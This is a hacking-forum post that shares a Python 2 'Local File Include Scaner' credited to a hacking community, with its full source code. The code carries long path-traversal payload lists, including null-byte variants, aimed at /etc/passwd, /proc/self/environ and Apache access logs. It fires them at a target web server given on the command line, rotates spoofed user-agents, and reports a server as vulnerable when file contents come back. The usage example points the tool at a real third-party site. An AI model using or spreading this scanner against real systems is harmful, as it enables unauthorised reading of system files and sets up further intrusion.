Jump to content
Fi8sVrs

Local File Include Scaner

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted 

# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner
# Greets: To all members of r00tw0rm !!

Usage: h3x4r.py <Target IP> <Port> <Path>
Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src=

Information

-- Random User-Agent

-- Coded Use Language Python

Banner()

help.png

Not Vulnerability

not.png

Vulnerability

vul.png

[*] Update Ver. 1.1

Menu Select

Screenshot-8.png

Add scan type environ,logs

Screenshot-8.png

Screenshot-9.png

[Python] scan ver 1.1.py - Pastebin.com

#!/usr/bin/python
# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner Ver. 1.1
# Greets: To all members of r00tw0rm !!

import socket,sys,re,random,time,httplib
from random import choice

passwd = ["/etc/passwd",
	"../etc/passwd",
	"../../etc/passwd",
	"../../../etc/passwd",
	"../../../../etc/passwd",
	"../../../../../etc/passwd",
	"../../../../../../etc/passwd",
	"../../../../../../../etc/passwd",
	"../../../../../../../../etc/passwd",
	"../../../../../../../../../etc/passwd",
	"../../../../../../../../../../etc/passwd",
	"../../../../../../../../../../../etc/passwd",
	"../../../../../../../../../../../../etc/passwd",
	"../../../../../../../../../../../../../etc/passwd",
	"/etc/passwd%00",
	"../etc/passwd%00",
	"../../etc/passwd%00",
	"../../../etc/passwd%00",
	"../../../../etc/passwd%00",
	"../../../../../etc/passwd%00",
	"../../../../../../etc/passwd%00",
	"../../../../../../../etc/passwd%00",
	"../../../../../../../../etc/passwd%00",
	"../../../../../../../../../etc/passwd%00",
	"../../../../../../../../../../etc/passwd%00",
	"../../../../../../../../../../../etc/passwd%00",
	"../../../../../../../../../../../../etc/passwd%00",
	"../../../../../../../../../../../../../etc/passwd%00"]

environ = ["/proc/self/environ",
	"../proc/self/environ",
	"../../proc/self/environ",
	"../../../proc/self/environ",
	"../../../../proc/self/environ",
	"../../../../../proc/self/environ",
	"../../../../../../proc/self/environ",
	"../../../../../../../proc/self/environ",
	"../../../../../../../../proc/self/environ",
	"../../../../../../../../../proc/self/environ",
	"../../../../../../../../../../proc/self/environ",
	"../../../../../../../../../../../proc/self/environ",
	"../../../../../../../../../../../../proc/self/environ",
	"../../../../../../../../../../../../../proc/self/environ",
	"../../../../../../../../../../../../../../proc/self/environ",
	"/proc/self/environ%00",
	"../proc/self/environ%00",
	"../../proc/self/environ%00",
	"../../../proc/self/environ%00",
	"../../../../proc/self/environ%00",
	"../../../../../proc/self/environ%00",
	"../../../../../../proc/self/environ%00",
	"../../../../../../../proc/self/environ%00",
	"../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../../../../../proc/self/environ%00",
	"../../../../../../../../../../../../../../proc/self/environ%00"]

logs = ["/usr/local/apache2/logs/access_log",
	"../usr/local/apache2/logs/access_log",
	"../../usr/local/apache2/logs/access_log",
	"../../../usr/local/apache2/logs/access_log",
	"../../../../usr/local/apache2/logs/access_log",
	"../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
	"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
	"/usr/local/apache2/logs/access_log%00",
	"../usr/local/apache2/logs/access_log%00",
	"../../usr/local/apache2/logs/access_log%00",
	"../../../usr/local/apache2/logs/access_log%00",
	"../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
	"/var/log/apache2/access.log",
	"../var/log/apache2/access.log",
	"../../var/log/apache2/access.log",
	"../../../var/log/apache2/access.log",
	"../../../../var/log/apache2/access.log",
	"../../../../../var/log/apache2/access.log",
	"../../../../../../var/log/apache2/access.log",
	"../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../../../../../var/log/apache2/access.log",
	"../../../../../../../../../../../../../../var/log/apache2/access.log",
	"/var/log/apache2/access.log%00",
	"../var/log/apache2/access.log%00",
	"../../var/log/apache2/access.log%00",
	"../../../var/log/apache2/access.log%00",
	"../../../../var/log/apache2/access.log%00",
	"../../../../../var/log/apache2/access.log%00",
	"../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../../../../../var/log/apache2/access.log%00",
	"../../../../../../../../../../../../../../var/log/apache2/access.log%00",
	"/var/log/httpd/access_log",
	"../var/log/httpd/access_log",
	"../../var/log/httpd/access_log",
	"../../../var/log/httpd/access_log",
	"../../../../var/log/httpd/access_log",
	"../../../../../var/log/httpd/access_log",
	"../../../../../../var/log/httpd/access_log",
	"../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../../../../../var/log/httpd/access_log",
	"../../../../../../../../../../../../../../var/log/httpd/access_log",
	"/var/log/httpd/access_log%00",
	"../var/log/httpd/access_log%00",
	"../../var/log/httpd/access_log%00",
	"../../../var/log/httpd/access_log%00",
	"../../../../var/log/httpd/access_log%00",
	"../../../../../var/log/httpd/access_log%00",
	"../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../../../../../var/log/httpd/access_log%00",
	"../../../../../../../../../../../../../../var/log/httpd/access_log%00",
	"/var/log/httpd-access.log",
	"../var/log/httpd-access.log",
	"../../var/log/httpd-access.log",
	"../../../var/log/httpd-access.log",
	"../../../../var/log/httpd-access.log",
	"../../../../../var/log/httpd-access.log",
	"../../../../../../var/log/httpd-access.log",
	"../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../../../../../var/log/httpd-access.log",
	"../../../../../../../../../../../../../../var/log/httpd-access.log",
	"/var/log/httpd-access.log%00",
	"../var/log/httpd-access.log%00",
	"../../var/log/httpd-access.log%00",
	"../../../var/log/httpd-access.log%00",
	"../../../../var/log/httpd-access.log%00",
	"../../../../../var/log/httpd-access.log%00",
	"../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../../../../../var/log/httpd-access.log%00",
	"../../../../../../../../../../../../../../var/log/httpd-access.log%00",
	"/var/www/logs/access_log",
	"../var/www/logs/access_log",
	"../../var/www/logs/access_log",
	"../../../var/www/logs/access_log",
	"../../../../var/www/logs/access_log",
	"../../../../../var/www/logs/access_log",
	"../../../../../../var/www/logs/access_log",
	"../../../../../../../var/www/logs/access_log",
	"../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../../../../../var/www/logs/access_log",
	"../../../../../../../../../../../../../../var/www/logs/access_log",
	"/var/www/logs/access_log%00",
	"../var/www/logs/access_log%00",
	"../../var/www/logs/access_log%00",
	"../../../var/www/logs/access_log%00",
	"../../../../var/www/logs/access_log%00",
	"../../../../../var/www/logs/access_log%00",
	"../../../../../../var/www/logs/access_log%00",
	"../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../../../../../var/www/logs/access_log%00",
	"../../../../../../../../../../../../../../var/www/logs/access_log%0",
	"/var/apache2/logs/access_log",
	"../var/apache2/logs/access_log",
	"../../var/apache2/logs/access_log",
	"../../../var/apache2/logs/access_log",
	"../../../../var/apache2/logs/access_log",
	"../../../../../var/apache2/logs/access_log",
	"../../../../../../var/apache2/logs/access_log",
	"../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../../../../../var/apache2/logs/access_log",
	"../../../../../../../../../../../../../../var/apache2/logs/access_log",
	"/var/apache2/logs/access_log%00",
	"../var/apache2/logs/access_log%00",
	"../../var/apache2/logs/access_log%00",
	"../../../var/apache2/logs/access_log%00",
	"../../../../var/apache2/logs/access_log%00",
	"../../../../../var/apache2/logs/access_log%00",
	"../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../../../../../var/apache2/logs/access_log%00",
	"../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]

user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
	'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
	'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
	'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
	'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
	'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
	'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
	'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
	'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
	'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']

agent = random.choice(user)

def scanpasswd():
	for lfi in passwd:
		try:   
			r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
			r.connect((target, port))
			r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
			r.send("Host: "+target+"\r\n")
			r.send("User-Agent: "+agent+"\r\n\r\n")
			print "[*] Send Request Success"
			print "http://"+target+"/"+path+lfi
			page = r.recv(1024)
			fullpage = ""
			while len(page):
				fullpage = fullpage + page
				page = r.recv(1024)
			r.close()
		except Exception, e:
			print "[-] Cant Not Send Request"
			print e
			sys.exit(1)
		r00t = re.search("root:x:0:0:",fullpage)
		if r00t:
			print "\033[32m[*] Request Vulnerability\n"
			sys.exit(1)
		else:
			print "[-] Request Is Not Vulnerability\n"
		time.sleep(1)

def scanenviron():
	for lfi1 in environ:
		try:   
			r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
			r.connect((target, port))
			r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
			r.send("Host: "+target+"\r\n")
			r.send("User-Agent: "+agent+"\r\n\r\n")
			print "[*] Send Request Success"
			print "http://"+target+"/"+path+lfi1
			page = r.recv(1024)
			fullpage = ""
			while len(page):
				fullpage = fullpage + page
				page = r.recv(1024)
			r.close()
		except Exception, e:
			print "[-] Cant Not Send Request"
			print e
			sys.exit(1)
		r00t = re.search("HTTP_HOST",fullpage)
		if r00t:
			print "\033[32m[*] Request Vulnerability\n"
			sys.exit(1)
		else:
			print "[-] Request Is Not Vulnerability\n"
		time.sleep(1)

def scanlogs():
	conn = httplib.HTTPConnection(target)
	conn.request("HEAD","/")
	for lfi2 in logs:
		try:   
			r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
			r.connect((target, port))
			r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
			r.send("Host: "+target+"\r\n")
			r.send("User-Agent: "+agent+"\r\n\r\n")
			print "[*] Send Request Success"
			print "http://"+target+"/"+path+lfi2
			page = r.recv(1024)
			fullpage = ""
			while len(page):
				fullpage = fullpage + page
				page = r.recv(1024)
			r.close()
		except Exception, e:
			print "[-] Cant Not Send Request"
			print e
			sys.exit(1)
		r00t = re.search("HEAD / HTTP/1.1",fullpage)
		if r00t:
			print "\033[32m[*] Request Vulnerability\n"
			sys.exit(1)
		else:
			print "[-] Request Is Not Vulnerability\n"
		time.sleep(1)

def menu():
	print "Menu:\n"
	print "ID [1]"
	print "[Scan /etc/passwd File]\n"
	print "ID [2]"
	print "[Scan Environ File]\n"
	print "ID [3]"
	print "[Scan Access Logs File]\n"
	print "ID [4]"
	print "[Exit]\n"
	mess = raw_input("[*] Select ID For Start Scanner :")
	if mess == "1":
		print "Scan /etc/passwd File Starting ...\n"
		scanpasswd()
		sys.exit(1)
	if mess == "2":
		print "Scan /proc/self/environ File Starting ...\n"
		scanenviron()
		sys.exit(1)
	if mess == "3":
		print "Scan Access Logs File Starting ...\n"
		scanlogs()
		sys.exit(1)
	if mess == "4":
		print "Exiting..."
		sys.exit(1)
	else:
		print "Unknow Command\n"
		print "Please rechoice ID\n"
		menu()

def banner():
	print "\n"
	print "****************************************************************************"
	print "||                         Local File Include Scaner Ver. 1.1             ||"
	print "||                                 by parkdream1                          ||"
	print "||                        (c) R00TW0RM - Private Community                ||"
	print "                    Fucking from "+target+" on port "+str(port)
	print "****************************************************************************"
	print "\n"

if __name__ == '__main__':
	if len(sys.argv) != 4:
		print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
		print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
		sys.exit(1)

	target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]

	banner()
	menu()

source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...